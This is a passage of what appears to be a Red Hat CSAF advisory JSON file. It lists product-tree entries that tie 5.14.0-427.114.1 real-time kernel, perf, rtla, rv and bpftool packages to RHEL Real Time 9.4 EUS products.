"product_reference": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.4)",
"product_id": "NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "rv-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "NFV-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64"
},
"product_reference": "bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.4)",
"product_id": "RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "RT-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
